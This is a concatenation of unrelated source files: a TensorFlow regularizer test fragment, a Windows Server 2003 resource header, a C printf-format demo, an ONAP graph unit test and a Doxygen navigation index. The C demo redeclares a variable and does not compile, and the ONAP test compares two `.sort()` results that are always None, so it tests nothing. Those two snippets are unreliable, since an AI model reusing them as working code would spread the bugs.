# image = tf.constant(0.0, shape=[1, 17, 19, NUM_CHANNELS]) conv1 = layers.conv2d( image, 13, [7, 5], padding='SAME', scope='conv1') conv2 = layers.conv2d( image, 23, [1, 1], padding='SAME', scope='conv2') self.concat = tf.concat([conv1, conv2], 3) self.convt = layers.conv2d_transpose( image, 29, [7, 5], stride=3, padding='SAME', scope='convt') self.name_to_var = {v.op.name: v for v in tf.global_variables()} with self.test_session(): tf.global_variables_initializer().run() threshold = 1.0 flop_reg = flop_regularizer.GroupLassoFlopsRegularizer( [self.concat.op, self.convt.op], threshold=threshold) with self.test_session() as s: evaluated_vars = s.run(self.name_to_var) def group_norm(weights, axis=(0, 1, 2)): # pylint: disable=invalid-name return np.sqrt(np.mean(weights**2, axis=axis)) reg_vectors = { 'conv1': group_norm(evaluated_vars['conv1/weights'], (0, 1, 2)), 'conv2': group_norm(evaluated_vars['conv2/weights'], (0, 1, 2)), 'convt': group_norm(evaluated_vars['convt/weights'], (0, 1, 3)) } num_alive = {k: np.sum(r > threshold) for k, r in reg_vectors.iteritems()} total_outputs = ( reg_vectors['conv1'].shape[0] + reg_vectors['conv2'].shape[0]) total_alive_outputs = sum(num_alive.values()) assert total_alive_outputs > 0, ( 'All outputs are dead - test is trivial. Decrease the threshold.') assert total_alive_outputs < total_outputs, ( 'All outputs are alive - test is trivial. 
Increase the threshold.') coeff1 = _coeff(_get_op('conv1/Conv2D')) coeff2 = _coeff(_get_op('conv2/Conv2D')) coefft = _coeff(_get_op('convt/conv2d_transpose')) expected_flop_cost = NUM_CHANNELS * ( coeff1 * num_alive['conv1'] + coeff2 * num_alive['conv2'] + coefft * num_alive['convt']) expected_reg_term = NUM_CHANNELS * ( coeff1 * np.sum(reg_vectors['conv1']) + coeff2 * np.sum( reg_vectors['conv2']) + coefft * np.sum(reg_vectors['convt'])) with self.test_session(): self.assertEqual( round(expected_flop_cost), round(flop_reg.get_cost().eval())) self.assertNearRelatively(expected_reg_term, flop_reg.get_regularization_term().eval()) def _get_op(name): # pylint: disable=invalid-name return tf.get_default_graph().get_operation_by_name(name) if __name__ == '__main__': tf.test.main()
npocmaka/Windows-Server-2003
ds/security/ssr/te/resource.h
//{{NO_DEPENDENCIES}}
// Microsoft Developer Studio generated include file.
// Used by SSRTE.rc
//
// String-table / resource identifiers for the SSR transformation engine.
// Note: IDR_* (resource) and IDS_* (string) IDs live in separate namespaces,
// so the repeated numeric values (101, 104) are intentional.
#define IDS_PROJNAME                    100
#define IDR_SSRTENGINE                  101
#define IDS_TRANSFORM_SUCCEEDED         101
#define IDS_TRANSFORM_FAILED            102
#define IDS_FILEWRITE_FAILED            103
#define IDR_FEEDBACK                    104
#define IDS_FILEREAD_FAILED             104
#define IDS_FILECREATE_FAILED           105
#define IDS_FILECREATE_SUCCEEDED        106
#define IDS_DOM_PROPERTY_PUT_FAILED     107
#define IDS_DOM_LOAD_FAILED             108
#define IDS_NOT_SUPPORTED_SCRIPT_FILE_TYPE 109
#define IDS_EXIT_CODE                   110
#define IDS_ERROR_CREATE_PROCESS        111
#define IDS_EXECUTE_SCRIPT              112
#define IDS_RUNSCRIPTS                  113
#define IDS_LOAD_MEM_ACTION_DATA        114
#define IDS_DO_ACTION_VERB              115
#define IDS_NO_CUSTOM_MEMBER_OBJ        116
#define IDS_MISSING_CUSTOM_MEMBER       117
#define IDS_NO_SCRIPT_FILES             118
#define IDS_TRANSFORM                   119
#define IDS_LAUNCH_SCRIPTS              120
#define IDS_DO_CUSTOM                   121
#define IDS_NO_ACTION                   122
#define IDS_CANNOT_ACCESS_FILE          123
#define IDS_FAIL_MOVE_FILE              124
#define IDS_FAIL_CREATE_DIRECTORY       125
#define IDS_LOAD_SECPOLICY              126
#define IDS_REG_TYPE_NOT_SUPPORTED      127
#define IDS_TOTAL_STEPS                 128
#define IDS_START_CLEANUP_CONFIGURE_OUTPUTS 129
#define IDS_END_CLEANUP_CONFIGURE_OUTPUTS 130
#define IDS_START_BACKUP_ROLLBACK_OUTPUTS 131
#define IDS_END_BACKUP_ROLLBACK_OUTPUTS 132
#define IDS_NO_SCRIPTS_TO_RUN           133
#define IDS_RUNNING_SCRIPTS             134
#define IDS_INVALID_PARAMETER           135
#define IDS_CREATE_IXSLPROC_FAILED      136
#define IDS_XSL_TRANSFORM_FAILED        137
#define IDS_SSR_START_ACTION_TRANSFORM  138
#define IDS_SSR_START_ACTION_APPLY      139
#define IDS_START_CUSTOM                140
#define IDS_START_XSL_TRANSFORM         141
#define IDS_START_SCRIPTS               142
#define IDS_END_CUSTOM                  143
#define IDS_END_XSL_TRANSFORM           144
#define IDS_END_SCRIPTS                 145
#define IDS_SSR_END_ACTION_TRANSFORM    146
#define IDS_SSR_END_ACTION_APPLY        147
#define IDS_MISSING_SECPOLICY           148
#define IDS_SECPOLICY_INVALID_TYPE      149
#define IDS_FAIL_CREATE_XSLT            150
#define IDS_XML_PARSING_ERROR           151
#define IDS_OBJECT_NOT_FOUND            152
#define IDS_MISSING_MEMBER              153
#define IDS_MEMBER_NOT_SUPPORT_ACTION   154
#define IDS_MISSING_PROGID              155
#define IDS_XML_LOADING_MEMBER          156
#define IDS_XML_LOADING_PROCEDURE       157

// Next default values for new objects
//
#ifdef APSTUDIO_INVOKED
#ifndef APSTUDIO_READONLY_SYMBOLS
#define _APS_NEXT_RESOURCE_VALUE        201
#define _APS_NEXT_COMMAND_VALUE         32768
#define _APS_NEXT_CONTROL_VALUE         201
#define _APS_NEXT_SYMED_VALUE           128
#endif
#endif
CrazyJ36/c
c/odd-long-numbers.c
<gh_stars>0 /* This shows why some long types need to be formatted properly. */ #include <stdio.h> int main() { // short int, unsigned short int - h short int i = 3; printf( "%hd", i ); // long int or unsigned long int - l long int i = 3; printf( "%ld", i ); // wide characters or strings - l wchar_t* wide_str = L"Wide String"; printf( "%ls", wide_str ); // long double - L long double d = 3.1415926535; printf( "%Lg", d ); printf("\n"); return 0; }
onap/vfc-nfvo-lcm
lcm/workflows/graphflow/tests/graph_tests.py
# Copyright 2018 ZTE Corporation. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import logging from django.test import TestCase from lcm.workflows.graphflow.flow.graph import Graph logger = logging.getLogger(__name__) class TestToscaparser(TestCase): def setUp(self): pass def tearDown(self): pass def test_graph(self): data = { "cucp": [], "du": [], "vl_flat_net": ["cucp", "cuup"], "vl_ext_net": ["cucp", "cuup"], "cuup": [] } graph = Graph(data) self.assertEqual(['vl_ext_net', 'vl_flat_net'].sort(), graph.get_pre_nodes("cucp").sort())
Acidburn0zzz/ComputeLibrary
documentation/navtreeindex8.js
// Doxygen-generated navigation tree index (chunk 8): maps documentation page
// anchors to their [section, ...path] positions in the navtree.
// Machine-generated — do not edit by hand.
var NAVTREEINDEX8 = { "classarm__compute_1_1_c_l_convolution_rectangle.xhtml":[4,0,0,55], "classarm__compute_1_1_c_l_convolution_rectangle.xhtml#aa0b5cdc99cad00d35521aa756365cef2":[4,0,0,55,0], "classarm__compute_1_1_c_l_convolution_rectangle_kernel.xhtml":[4,0,0,56], "classarm__compute_1_1_c_l_convolution_rectangle_kernel.xhtml#a2146854d485039a04e73bb6254ae788b":[4,0,0,56,0], "classarm__compute_1_1_c_l_convolution_rectangle_kernel.xhtml#a4075f3040a87951071878e672bab27dd":[4,0,0,56,1], "classarm__compute_1_1_c_l_convolution_rectangle_kernel.xhtml#a40c8a145562e3a8a4aa332a5ee17d4c9":[4,0,0,56,2], "classarm__compute_1_1_c_l_convolution_rectangle_kernel.xhtml#a423f9a45a52983b4de5e2b347f4369c7":[4,0,0,56,3], "classarm__compute_1_1_c_l_convolution_rectangle_kernel.xhtml#a493987e85723a8000eb26d1f00e2ad0e":[4,0,0,56,7], "classarm__compute_1_1_c_l_convolution_rectangle_kernel.xhtml#abcf9df2e9d1da8abf27ca1678951673f":[4,0,0,56,4], "classarm__compute_1_1_c_l_convolution_rectangle_kernel.xhtml#ac746b3604d6b86789f4c817e095f9147":[4,0,0,56,6], "classarm__compute_1_1_c_l_convolution_rectangle_kernel.xhtml#afce1f7a8135ce82d5e12342bb05f8448":[4,0,0,56,5], "classarm__compute_1_1_c_l_convolution_square.xhtml":[4,0,0,57], "classarm__compute_1_1_c_l_convolution_square.xhtml#a185b873a3353e6b3595cfabf3f34a15a":[4,0,0,57,0], "classarm__compute_1_1_c_l_convolution_square.xhtml#a26e1b4686b1f2d591d62d11585114a82":[4,0,0,57,1], "classarm__compute_1_1_c_l_convolution_square.xhtml#ad1717410afd0be936c6213a63c8005fb":[4,0,0,57,2], "classarm__compute_1_1_c_l_copy_to_array_kernel.xhtml":[4,0,0,58], "classarm__compute_1_1_c_l_copy_to_array_kernel.xhtml#a09ceae93051ead63b10d88903c5a62be":[4,0,0,58,6], "classarm__compute_1_1_c_l_copy_to_array_kernel.xhtml#a1d8f06853b678915058ff9e8259948b3":[4,0,0,58,4], "classarm__compute_1_1_c_l_copy_to_array_kernel.xhtml#a493987e85723a8000eb26d1f00e2ad0e":[4,0,0,58,7],
"classarm__compute_1_1_c_l_copy_to_array_kernel.xhtml#a4b3ff5e7b109a563e4c98e45eb66ad7a":[4,0,0,58,2], "classarm__compute_1_1_c_l_copy_to_array_kernel.xhtml#a7fa1d109f0c6d72521e336fd3955cee9":[4,0,0,58,3], "classarm__compute_1_1_c_l_copy_to_array_kernel.xhtml#a8c3e5f7865d66adaa39c33a83211f261":[4,0,0,58,5], "classarm__compute_1_1_c_l_copy_to_array_kernel.xhtml#ad415131ea86e6ea86d5ebb8323e24d98":[4,0,0,58,0], "classarm__compute_1_1_c_l_copy_to_array_kernel.xhtml#ae6053af1378d0f87cdf91960151f6dfe":[4,0,0,58,1], "classarm__compute_1_1_c_l_depth_concatenate.xhtml":[4,0,0,59], "classarm__compute_1_1_c_l_depth_concatenate.xhtml#a3d0f9f20c596a526f57599567b5a1b7c":[4,0,0,59,0], "classarm__compute_1_1_c_l_depth_concatenate.xhtml#ad1717410afd0be936c6213a63c8005fb":[4,0,0,59,2], "classarm__compute_1_1_c_l_depth_concatenate.xhtml#ae1e594a6c6605fb33245f84722039eab":[4,0,0,59,1], "classarm__compute_1_1_c_l_depth_concatenate_kernel.xhtml":[4,0,0,60], "classarm__compute_1_1_c_l_depth_concatenate_kernel.xhtml#a07c55a4048def5df8488d02a45d65dff":[4,0,0,60,2], "classarm__compute_1_1_c_l_depth_concatenate_kernel.xhtml#a32955eb357feab66e9944fd48e951b41":[4,0,0,60,6], "classarm__compute_1_1_c_l_depth_concatenate_kernel.xhtml#a423f9a45a52983b4de5e2b347f4369c7":[4,0,0,60,4], "classarm__compute_1_1_c_l_depth_concatenate_kernel.xhtml#a493987e85723a8000eb26d1f00e2ad0e":[4,0,0,60,8], "classarm__compute_1_1_c_l_depth_concatenate_kernel.xhtml#a4ee8d5598cedd9b60bee7bcbd95108a1":[4,0,0,60,1], "classarm__compute_1_1_c_l_depth_concatenate_kernel.xhtml#a549e2c4623a2518e98e6d35f93c051b2":[4,0,0,60,0], "classarm__compute_1_1_c_l_depth_concatenate_kernel.xhtml#a88ec361931b563961b73a6295030a60f":[4,0,0,60,3], "classarm__compute_1_1_c_l_depth_concatenate_kernel.xhtml#a96671071c32559313f5827c5487f9f72":[4,0,0,60,5], "classarm__compute_1_1_c_l_depth_concatenate_kernel.xhtml#ad28d0a0745609ae52f6c2eff337bc38e":[4,0,0,60,7], "classarm__compute_1_1_c_l_depth_convert.xhtml":[4,0,0,61],
"classarm__compute_1_1_c_l_depth_convert.xhtml#a536f0de1a70ea80d40b0a24657ac5290":[4,0,0,61,0], "classarm__compute_1_1_c_l_depth_convert_kernel.xhtml":[4,0,0,62], "classarm__compute_1_1_c_l_depth_convert_kernel.xhtml#a536f0de1a70ea80d40b0a24657ac5290":[4,0,0,62,0], "classarm__compute_1_1_c_l_derivative.xhtml":[4,0,0,63], "classarm__compute_1_1_c_l_derivative.xhtml#a62d1b655e7211f3ab44ed1a9c81a1336":[4,0,0,63,0], "classarm__compute_1_1_c_l_derivative_kernel.xhtml":[4,0,0,64], "classarm__compute_1_1_c_l_derivative_kernel.xhtml#a3ef5b9e1c310e83a57980bb4f897283a":[4,0,0,64,6], "classarm__compute_1_1_c_l_derivative_kernel.xhtml#a423f9a45a52983b4de5e2b347f4369c7":[4,0,0,64,4], "classarm__compute_1_1_c_l_derivative_kernel.xhtml#a493987e85723a8000eb26d1f00e2ad0e":[4,0,0,64,8], "classarm__compute_1_1_c_l_derivative_kernel.xhtml#a70712b2131aad30e1abd393799c6fa25":[4,0,0,64,0], "classarm__compute_1_1_c_l_derivative_kernel.xhtml#a772202e263f323ab3f5c6e1066e0e4f9":[4,0,0,64,1], "classarm__compute_1_1_c_l_derivative_kernel.xhtml#a83d38310c15f7b92264b5403ddd0bbda":[4,0,0,64,3], "classarm__compute_1_1_c_l_derivative_kernel.xhtml#ab24f49526202babfe7df925cd326427b":[4,0,0,64,5], "classarm__compute_1_1_c_l_derivative_kernel.xhtml#ac3a2c95536dfbe4ea71e3c1441cd2960":[4,0,0,64,2], "classarm__compute_1_1_c_l_derivative_kernel.xhtml#aceb0191986422c3fcc97f2e9ed9fe15c":[4,0,0,64,7], "classarm__compute_1_1_c_l_dilate.xhtml":[4,0,0,65], "classarm__compute_1_1_c_l_dilate.xhtml#ad6a993d736f6f84aa672d3f550135c6e":[4,0,0,65,0], "classarm__compute_1_1_c_l_dilate_kernel.xhtml":[4,0,0,66], "classarm__compute_1_1_c_l_dilate_kernel.xhtml#a423f9a45a52983b4de5e2b347f4369c7":[4,0,0,66,0], "classarm__compute_1_1_c_l_dilate_kernel.xhtml#a67b0c2ccd2c37a8d29fa6cc4b26795d8":[4,0,0,66,1], "classarm__compute_1_1_c_l_distribution1_d.xhtml":[4,0,0,67], "classarm__compute_1_1_c_l_distribution1_d.xhtml#a14c53d2d17be6fa8a2c9861527c7b002":[4,0,0,67,3],
"classarm__compute_1_1_c_l_distribution1_d.xhtml#a1b056f14381ab6eda09ed227a3d9e9e5":[4,0,0,67,0], "classarm__compute_1_1_c_l_distribution1_d.xhtml#a1ffeb3b5abb3d61f62b58a391816201c":[4,0,0,67,5], "classarm__compute_1_1_c_l_distribution1_d.xhtml#a55dcc12377d15f244c59975f7cd1f623":[4,0,0,67,2], "classarm__compute_1_1_c_l_distribution1_d.xhtml#a5d11cfbbf69ebbd595d8aee3ecbafedb":[4,0,0,67,4], "classarm__compute_1_1_c_l_distribution1_d.xhtml#a9674808e8d2cc69872c97663ca4d6cab":[4,0,0,67,1], "classarm__compute_1_1_c_l_edge_non_max_suppression_kernel.xhtml":[4,0,0,68], "classarm__compute_1_1_c_l_edge_non_max_suppression_kernel.xhtml#a209e05c2e2bf4d5fb2b9e3f75c7d79aa":[4,0,0,68,3], "classarm__compute_1_1_c_l_edge_non_max_suppression_kernel.xhtml#a423f9a45a52983b4de5e2b347f4369c7":[4,0,0,68,2], "classarm__compute_1_1_c_l_edge_non_max_suppression_kernel.xhtml#a493987e85723a8000eb26d1f00e2ad0e":[4,0,0,68,5], "classarm__compute_1_1_c_l_edge_non_max_suppression_kernel.xhtml#a594c3386342734f366460fccc6171c98":[4,0,0,68,0], "classarm__compute_1_1_c_l_edge_non_max_suppression_kernel.xhtml#a9582b4541bbf86edf4f564ddd430af4b":[4,0,0,68,1], "classarm__compute_1_1_c_l_edge_non_max_suppression_kernel.xhtml#aaa7e7959c4a5ab3705e79d81a7e94f1d":[4,0,0,68,4], "classarm__compute_1_1_c_l_edge_trace_kernel.xhtml":[4,0,0,69], "classarm__compute_1_1_c_l_edge_trace_kernel.xhtml#a148f844f5f772a8f9748b497e2b01615":[4,0,0,69,0], "classarm__compute_1_1_c_l_edge_trace_kernel.xhtml#a420e0af90c5d9c001b895f479e311a56":[4,0,0,69,1], "classarm__compute_1_1_c_l_edge_trace_kernel.xhtml#a493987e85723a8000eb26d1f00e2ad0e":[4,0,0,69,4], "classarm__compute_1_1_c_l_edge_trace_kernel.xhtml#ae4e8839e52f8f14feef09d819170b40d":[4,0,0,69,3], "classarm__compute_1_1_c_l_edge_trace_kernel.xhtml#af4b40677259a11edd3e83e82c1c6dd9d":[4,0,0,69,2], "classarm__compute_1_1_c_l_equalize_histogram.xhtml":[4,0,0,70], "classarm__compute_1_1_c_l_equalize_histogram.xhtml#a1edc340b1cd348c89f088a0698a8b129":[4,0,0,70,0],
"classarm__compute_1_1_c_l_equalize_histogram.xhtml#a78c50e58e4c8be6de11ac6e78ca02eff":[4,0,0,70,1], "classarm__compute_1_1_c_l_equalize_histogram.xhtml#ad1717410afd0be936c6213a63c8005fb":[4,0,0,70,2], "classarm__compute_1_1_c_l_erode.xhtml":[4,0,0,71], "classarm__compute_1_1_c_l_erode.xhtml#ad6a993d736f6f84aa672d3f550135c6e":[4,0,0,71,0], "classarm__compute_1_1_c_l_erode_kernel.xhtml":[4,0,0,72], "classarm__compute_1_1_c_l_erode_kernel.xhtml#a423f9a45a52983b4de5e2b347f4369c7":[4,0,0,72,0], "classarm__compute_1_1_c_l_erode_kernel.xhtml#a67b0c2ccd2c37a8d29fa6cc4b26795d8":[4,0,0,72,1], "classarm__compute_1_1_c_l_fast_corners.xhtml":[4,0,0,73], "classarm__compute_1_1_c_l_fast_corners.xhtml#a25c563ab5edb7241d8f12406ed96b40c":[4,0,0,73,2], "classarm__compute_1_1_c_l_fast_corners.xhtml#a5376467035ae425342d9feb333452d07":[4,0,0,73,3], "classarm__compute_1_1_c_l_fast_corners.xhtml#a6084c2106cb3a239e026e70151bb0b33":[4,0,0,73,0], "classarm__compute_1_1_c_l_fast_corners.xhtml#ad1717410afd0be936c6213a63c8005fb":[4,0,0,73,4], "classarm__compute_1_1_c_l_fast_corners.xhtml#ad6e12ec23a51a2963b4716cb7a59a40e":[4,0,0,73,1], "classarm__compute_1_1_c_l_fast_corners_kernel.xhtml":[4,0,0,74], "classarm__compute_1_1_c_l_fast_corners_kernel.xhtml#a20b6847087f9a922754b94067ddcb537":[4,0,0,74,1], "classarm__compute_1_1_c_l_fast_corners_kernel.xhtml#a2b06599adac42d0aa917573716356999":[4,0,0,74,3], "classarm__compute_1_1_c_l_fast_corners_kernel.xhtml#a423f9a45a52983b4de5e2b347f4369c7":[4,0,0,74,4], "classarm__compute_1_1_c_l_fast_corners_kernel.xhtml#a493987e85723a8000eb26d1f00e2ad0e":[4,0,0,74,8], "classarm__compute_1_1_c_l_fast_corners_kernel.xhtml#a70fd54f07efa6bc5b75e71ad68468b95":[4,0,0,74,0], "classarm__compute_1_1_c_l_fast_corners_kernel.xhtml#a84deccfff9f686445194594e058284bf":[4,0,0,74,5], "classarm__compute_1_1_c_l_fast_corners_kernel.xhtml#ac18eae467f4bbad88cbf69c5b835926b":[4,0,0,74,2],
"classarm__compute_1_1_c_l_fast_corners_kernel.xhtml#ac5e031f7c81be9bbac3372bb6edbd344":[4,0,0,74,6], "classarm__compute_1_1_c_l_fast_corners_kernel.xhtml#ac64dcd555f8756462b629bf58a28bfc3":[4,0,0,74,7], "classarm__compute_1_1_c_l_fill_border.xhtml":[4,0,0,75], "classarm__compute_1_1_c_l_fill_border.xhtml#acd47b636ec90ab214e6f194989ea7af5":[4,0,0,75,0], "classarm__compute_1_1_c_l_fill_border_kernel.xhtml":[4,0,0,76], "classarm__compute_1_1_c_l_fill_border_kernel.xhtml#a20ff8e5282e5f632ccd62f199e714f10":[4,0,0,76,1], "classarm__compute_1_1_c_l_fill_border_kernel.xhtml#a381be9310933ff673959d1d7b6842b8e":[4,0,0,76,0], "classarm__compute_1_1_c_l_fill_border_kernel.xhtml#a4370ae5fda7bd455a171fc8ed4d3f283":[4,0,0,76,5], "classarm__compute_1_1_c_l_fill_border_kernel.xhtml#a493987e85723a8000eb26d1f00e2ad0e":[4,0,0,76,8], "classarm__compute_1_1_c_l_fill_border_kernel.xhtml#a5054b330eb55a5ffade0405f2021abf4":[4,0,0,76,2], "classarm__compute_1_1_c_l_fill_border_kernel.xhtml#a569042df5e874046fe622b6723289a86":[4,0,0,76,6], "classarm__compute_1_1_c_l_fill_border_kernel.xhtml#a8c127ae32e8e5fa6bab31910663bcde1":[4,0,0,76,7], "classarm__compute_1_1_c_l_fill_border_kernel.xhtml#ac56c459beac7a6b904b6dece97b377e6":[4,0,0,76,9], "classarm__compute_1_1_c_l_fill_border_kernel.xhtml#ad22d0bc4356a4068c244952df68fd5c7":[4,0,0,76,3], "classarm__compute_1_1_c_l_fill_border_kernel.xhtml#ae1b9fe62ed42f469f1de879c33d75c06":[4,0,0,76,4], "classarm__compute_1_1_c_l_fully_connected_layer.xhtml":[4,0,0,77], "classarm__compute_1_1_c_l_fully_connected_layer.xhtml#a1ac038a6808c0f16eede67dc0372b8d3":[4,0,0,77,0], "classarm__compute_1_1_c_l_fully_connected_layer.xhtml#a55e5ebb7cdabf8bf197698453543dfb5":[4,0,0,77,1], "classarm__compute_1_1_c_l_fully_connected_layer.xhtml#ad1717410afd0be936c6213a63c8005fb":[4,0,0,77,2], "classarm__compute_1_1_c_l_fully_connected_layer_reshape_weights.xhtml":[4,0,0,78],
"classarm__compute_1_1_c_l_fully_connected_layer_reshape_weights.xhtml#a429b00993ed6d0fb5b9880984f981ab6":[4,0,0,78,1], "classarm__compute_1_1_c_l_fully_connected_layer_reshape_weights.xhtml#a60ae050703616fb6e60513b5ddc69731":[4,0,0,78,0], "classarm__compute_1_1_c_l_fully_connected_layer_reshape_weights.xhtml#ad1717410afd0be936c6213a63c8005fb":[4,0,0,78,2], "classarm__compute_1_1_c_l_g_e_m_m.xhtml":[4,0,0,89], "classarm__compute_1_1_c_l_g_e_m_m.xhtml#a48b9e5c0bdc8a7c306252dafff14741f":[4,0,0,89,1], "classarm__compute_1_1_c_l_g_e_m_m.xhtml#ab6b30155674bbcb9040b579cff3e5d32":[4,0,0,89,0], "classarm__compute_1_1_c_l_g_e_m_m.xhtml#ad1717410afd0be936c6213a63c8005fb":[4,0,0,89,2], "classarm__compute_1_1_c_l_g_e_m_m_interleave4x4.xhtml":[4,0,0,90], "classarm__compute_1_1_c_l_g_e_m_m_interleave4x4.xhtml#a074e10cfb217e657b9e81adeca2abc68":[4,0,0,90,0], "classarm__compute_1_1_c_l_g_e_m_m_interleave4x4_kernel.xhtml":[4,0,0,91], "classarm__compute_1_1_c_l_g_e_m_m_interleave4x4_kernel.xhtml#a074e10cfb217e657b9e81adeca2abc68":[4,0,0,91,3], "classarm__compute_1_1_c_l_g_e_m_m_interleave4x4_kernel.xhtml#a156b6ea0879f0350c72168e647aa58a5":[4,0,0,91,5], "classarm__compute_1_1_c_l_g_e_m_m_interleave4x4_kernel.xhtml#a4023b128129764d7d24882a5642fe49f":[4,0,0,91,0], "classarm__compute_1_1_c_l_g_e_m_m_interleave4x4_kernel.xhtml#a493987e85723a8000eb26d1f00e2ad0e":[4,0,0,91,6], "classarm__compute_1_1_c_l_g_e_m_m_interleave4x4_kernel.xhtml#a56008f3777b30dc6b002815c904a9c34":[4,0,0,91,4], "classarm__compute_1_1_c_l_g_e_m_m_interleave4x4_kernel.xhtml#a56f2f1474dd673f0f8d9df3ce377f33d":[4,0,0,91,2], "classarm__compute_1_1_c_l_g_e_m_m_interleave4x4_kernel.xhtml#a9f747ba6cad1650cd0184041de875411":[4,0,0,91,1], "classarm__compute_1_1_c_l_g_e_m_m_lowp.xhtml":[4,0,0,92], "classarm__compute_1_1_c_l_g_e_m_m_lowp.xhtml#a2300a95117613686ccf15b45f0f2ac79":[4,0,0,92,1], "classarm__compute_1_1_c_l_g_e_m_m_lowp.xhtml#aac051c3731008575fe02d576e0bbca11":[4,0,0,92,0],
"classarm__compute_1_1_c_l_g_e_m_m_lowp.xhtml#ad1717410afd0be936c6213a63c8005fb":[4,0,0,92,2], "classarm__compute_1_1_c_l_g_e_m_m_lowp_matrix_multiply_kernel.xhtml":[4,0,0,93], "classarm__compute_1_1_c_l_g_e_m_m_lowp_matrix_multiply_kernel.xhtml#a493987e85723a8000eb26d1f00e2ad0e":[4,0,0,93,6], "classarm__compute_1_1_c_l_g_e_m_m_lowp_matrix_multiply_kernel.xhtml#a5f55c40f31bba46fa72429c820ff8139":[4,0,0,93,1], "classarm__compute_1_1_c_l_g_e_m_m_lowp_matrix_multiply_kernel.xhtml#a759d01d5376a17c7b81131212588810a":[4,0,0,93,0], "classarm__compute_1_1_c_l_g_e_m_m_lowp_matrix_multiply_kernel.xhtml#a8aa4449c8d99240410f4e9dff644614b":[4,0,0,93,3], "classarm__compute_1_1_c_l_g_e_m_m_lowp_matrix_multiply_kernel.xhtml#af520778a23d6716080043321d07e9999":[4,0,0,93,4], "classarm__compute_1_1_c_l_g_e_m_m_lowp_matrix_multiply_kernel.xhtml#af7290399a051e470ba52daadd8d7f968":[4,0,0,93,5], "classarm__compute_1_1_c_l_g_e_m_m_lowp_matrix_multiply_kernel.xhtml#afdcbb16be23445f565801d54201c9b1d":[4,0,0,93,2], "classarm__compute_1_1_c_l_g_e_m_m_matrix_accumulate_biases_kernel.xhtml":[4,0,0,94], "classarm__compute_1_1_c_l_g_e_m_m_matrix_accumulate_biases_kernel.xhtml#a426791a071d27ffff5062e51fffac075":[4,0,0,94,0], "classarm__compute_1_1_c_l_g_e_m_m_matrix_accumulate_biases_kernel.xhtml#a493987e85723a8000eb26d1f00e2ad0e":[4,0,0,94,6], "classarm__compute_1_1_c_l_g_e_m_m_matrix_accumulate_biases_kernel.xhtml#a4d630279a30875fdd3814fd93d0386e3":[4,0,0,94,1], "classarm__compute_1_1_c_l_g_e_m_m_matrix_accumulate_biases_kernel.xhtml#a4d63931364ae453852888a37f13eac8b":[4,0,0,94,4], "classarm__compute_1_1_c_l_g_e_m_m_matrix_accumulate_biases_kernel.xhtml#a5bca3bc1430f853bb9254141596f4f22":[4,0,0,94,2], "classarm__compute_1_1_c_l_g_e_m_m_matrix_accumulate_biases_kernel.xhtml#acd42d73bdf14e61d6414450f134e9651":[4,0,0,94,3], "classarm__compute_1_1_c_l_g_e_m_m_matrix_accumulate_biases_kernel.xhtml#ada53e19e832615ed9f424882d6d10df8":[4,0,0,94,5],
"classarm__compute_1_1_c_l_g_e_m_m_matrix_addition_kernel.xhtml":[4,0,0,95], "classarm__compute_1_1_c_l_g_e_m_m_matrix_addition_kernel.xhtml#a00ca198bac061a1fdfbb4246e7048e63":[4,0,0,95,3], "classarm__compute_1_1_c_l_g_e_m_m_matrix_addition_kernel.xhtml#a03d036e8e66cf1c8128c921bbca897a7":[4,0,0,95,0], "classarm__compute_1_1_c_l_g_e_m_m_matrix_addition_kernel.xhtml#a493987e85723a8000eb26d1f00e2ad0e":[4,0,0,95,6], "classarm__compute_1_1_c_l_g_e_m_m_matrix_addition_kernel.xhtml#a6a78d63356d86ecf8e1ecd5b293087b8":[4,0,0,95,4], "classarm__compute_1_1_c_l_g_e_m_m_matrix_addition_kernel.xhtml#a85e8d5b8770128980c3fe00b25f6c8a2":[4,0,0,95,5], "classarm__compute_1_1_c_l_g_e_m_m_matrix_addition_kernel.xhtml#a91309d4cb7c55ed2695535421fa4346d":[4,0,0,95,2], "classarm__compute_1_1_c_l_g_e_m_m_matrix_addition_kernel.xhtml#a9e75cac7f23a70ebbb9369eaf45ac0e5":[4,0,0,95,1], "classarm__compute_1_1_c_l_g_e_m_m_matrix_multiply_kernel.xhtml":[4,0,0,96], "classarm__compute_1_1_c_l_g_e_m_m_matrix_multiply_kernel.xhtml#a4805eb2e5f4597f660f41753e9748eb8":[4,0,0,96,2], "classarm__compute_1_1_c_l_g_e_m_m_matrix_multiply_kernel.xhtml#a493987e85723a8000eb26d1f00e2ad0e":[4,0,0,96,6], "classarm__compute_1_1_c_l_g_e_m_m_matrix_multiply_kernel.xhtml#aa158230a3f3ea998530f91a14bb8e5a2":[4,0,0,96,5], "classarm__compute_1_1_c_l_g_e_m_m_matrix_multiply_kernel.xhtml#ab7ab139607e3a7812f2a7eb941ac7aa8":[4,0,0,96,1], "classarm__compute_1_1_c_l_g_e_m_m_matrix_multiply_kernel.xhtml#ac46a1c8a20b46838c9e894f703ddd3ee":[4,0,0,96,0], "classarm__compute_1_1_c_l_g_e_m_m_matrix_multiply_kernel.xhtml#adc79c03f5f41ab721edc1469e714c128":[4,0,0,96,3], "classarm__compute_1_1_c_l_g_e_m_m_matrix_multiply_kernel.xhtml#aea377825b4153d8ea48905038cbb0ff1":[4,0,0,96,4], "classarm__compute_1_1_c_l_g_e_m_m_transpose1x_w_kernel.xhtml":[4,0,0,97], "classarm__compute_1_1_c_l_g_e_m_m_transpose1x_w_kernel.xhtml#a074e10cfb217e657b9e81adeca2abc68":[4,0,0,97,0],
